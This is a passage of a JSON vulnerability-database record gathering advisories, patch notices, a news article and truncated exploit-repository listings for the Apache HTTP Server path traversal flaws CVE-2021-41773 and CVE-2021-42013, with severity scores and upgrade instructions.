"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "jvn", "title": "JVN#51106450: Apache HTTP Server vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "JVN:51106450", "href": "http://jvn.jp/en/jp/JVN51106450/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2023-02-08T16:13:05", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.51-i586-1_slack14.2.txz: Upgraded.\n SECURITY: CVE-2021-42013: Path Traversal and Remote Code\n Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete\n fix of CVE-2021-41773) (cve.mitre.org)\n It was found that the fix for CVE-2021-41773 in Apache HTTP\n Server 2.4.50 was insufficient. An attacker could use a path\n traversal attack to map URLs to files outside the directories\n configured by Alias-like directives.\n If files outside of these directories are not protected by the\n usual default configuration \"require all denied\", these requests\n can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution.\n This issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n earlier versions.\n Credits: Reported by Juan Escobar from Dreamlab Technologies,\n Fernando MuA+-oz from NULL Life CTF Team, and Shungo Kumasaka\n For more information, see:\n https://vulners.com/cve/CVE-2021-42013\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.51-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.51-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.51-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.51-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.51-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.51-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.51-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.51-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n3dc9af339945226035885f4896e7c443 httpd-2.4.51-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n621539c82e9f23a2b63ec4ad4fe60fa1 httpd-2.4.51-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nb05881b3d8d5ce4edc267c1ab6f70be1 httpd-2.4.51-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n7be7108c6acbf118df01c06632242607 httpd-2.4.51-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nd1d85a41387af3f18b777d000a023288 httpd-2.4.51-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n7909fd6353790b8cb3dd2d083ea7d6f3 httpd-2.4.51-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n169e11d499afa90780a1d8d9c23a5a94 n/httpd-2.4.51-i586-1.txz\n\nSlackware x86_64 -current package:\nc761e7d4fbc8198a21025b804a962874 n/httpd-2.4.51-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.51-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T03:27:06", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T03:27:06", "id": "SSA-2021-280-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.483439", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:13", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi9gb5J4PLNEOxKKFX0AtQmn2bTDIG7npW-qA9GjFCnWXfYi-8OQ9SwaukffMhVD5m6v18w7s2IpAunMHlqH_nua56nxSF75TEgWUfDcf1KLmAi1SoDdkWu8fPArAkFqIVxoe7CAN7QOWWYbeyshQ_288uhzAhqP4HxdGBKNYjXqgWRViZ4mY3tWIXj>)\n\nThe Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an \"incomplete fix\" for an [actively exploited](<https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html>) path traversal and remote code execution flaw that it patched earlier this week.\n\n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>), as the new vulnerability is identified as, builds upon [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), a flaw that impacts Apache web servers running version 2.4.49 and involves a [path normalization](<https://en.wikipedia.org/wiki/URI_normalization>) bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.\n\nAlthough the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the \"mod_cgi\" module was loaded and the configuration \"require all denied\" was absent, prompting Apache to issue another round of emergency updates.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgmP9T_SA-o28p-466VGcr78Opierbru3LfDlVgCT7nfEKQKBgOtCzZF_NPOrNPFlQ7eJPylLn2PZZ9equjRD9A7QS110HYjNvalKerBY2eb3flahaEkiLJHDTlWjOd8THOmBPNLqpyAi8vYLJ-uab-C08cNpuWCkNnPjJirzkc_4peC8oz756tcV43>)\n\n\"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,\" the company [noted](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) in an advisory. \"If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\"\n\nThe Apache Software Foundation credited Juan Escobar from Dreamlab Technologies, Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>) it's \"seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,\" urging \"organizations to patch immediately if they haven't already.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T04:47:00", "type": "thn", "title": "New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T02:57:44", "id": "THN:A0816B13A402B9865C624E3CA1B06EA5", "href": "https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\n\t Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\t (CVE-2021-42013).\nIt was found that the fix for CVE-2021-41773 in Apache HTTP\n\t Server 2.4.50 was insufficient. An attacker could use a path\n\t traversal attack to map URLs to files outside the directories\n\t configured by Alias-like directives.\nIf files outside of these directories are not protected by the\n\t usual default configuration \"require all denied\", these requests\n\t can succeed. If CGI scripts are also enabled for these aliased\n\t pathes, this could allow for remote code execution.\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n\t earlier versions.\nAcknowledgements: Reported by Juan Escobar from Dreamlab\n\t Technologies, Fernando Munoz from NULL Life CTF Team, and\n\t Shungo Kumasaka\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "freebsd", "title": "Apache httpd -- Path Traversal and Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "D001C189-2793-11EC-8FB1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-11-27T06:38:53", "description": "Arch Linux Security Advisory ASA-202110-1\n=========================================\n\nSeverity: Critical\nDate : 2021-10-21\nCVE-ID : CVE-2021-42013\nPackage : apache\nType : directory traversal\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2450\n\nSummary\n=======\n\nThe package apache before version 2.4.51-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 2.4.51-1.\n\n# pacman -Syu \"apache>=2.4.51-1\"\n\nThe problem has been fixed upstream in version 2.4.51.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives. If files outside of these directories are not protected by\nthe usual default configuration \"require all denied\", these requests\ncan succeed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution. This issue only affects\nApache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nImpact\n======\n\nA remote attacker could trick the HTTP server into executing arbitrary\nexecutables in its file system through path traversal.\n\nReferences\n==========\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013\nhttps://twitter.com/roman_soft/status/1446252280597078024\nhttps://github.com/icing/blog/blob/main/httpd-2.4.50.md\nhttps://svn.apache.org/viewvc?view=revision&revision=1893971\nhttps://security.archlinux.org/CVE-2021-42013", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:00:00", "type": "archlinux", "title": "[ASA-202110-1] apache: directory traversal", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T00:00:00", "id": "ASA-202110-1", "href": "https://security.archlinux.org/ASA-202110-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "# apache httpd path traversal checker\n\n\n## 0x00 \u6982\u8ff0\n\n20211005\uff0c\u7f51\u4e0a\u66dd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T10:38:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-31T07:15:01", "id": "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T20:16:36", "description": "# CVE-2021-41773_CVE-2021-42013\nCVE-2021-41773 CVE-2021-42013\u591a\u7ebf\u7a0b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T03:32:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-30T12:49:14", "id": "B81BC21D-818E-5B33-96D7-062C14102874", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# cve-2021-41773 and cve-2021-42013\n\ncve-2021-41773 \u548c cve-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T11:33:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T06:48:47", "id": "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T20:00:41", "description": " CVE-2021-41773/2021-42013 Mass Vulnerability Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T02:12:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-02-20T09:15:02", "id": "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "Apache HTTP Server\n\n What is it?\n -----------\n\n The Apache HT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T22:02:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T12:52:18", "id": "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:12:43", "description": "# CVE-2021-42013\n## Introduction\nIt was found that the fix for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T18:00:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:22:13", "id": "F41EE867-4E63-5259-9DF0-745881884D04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:15", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T00:56:28", "description": "## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T17:56:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-27T21:52:34", "id": "0C28A0EC-7162-5D73-BEC9-B034F5392847", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:59", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T04:08:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-03-14T04:20:42", "id": "495E99E5-C1B0-52C1-9218-384D04161BE4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 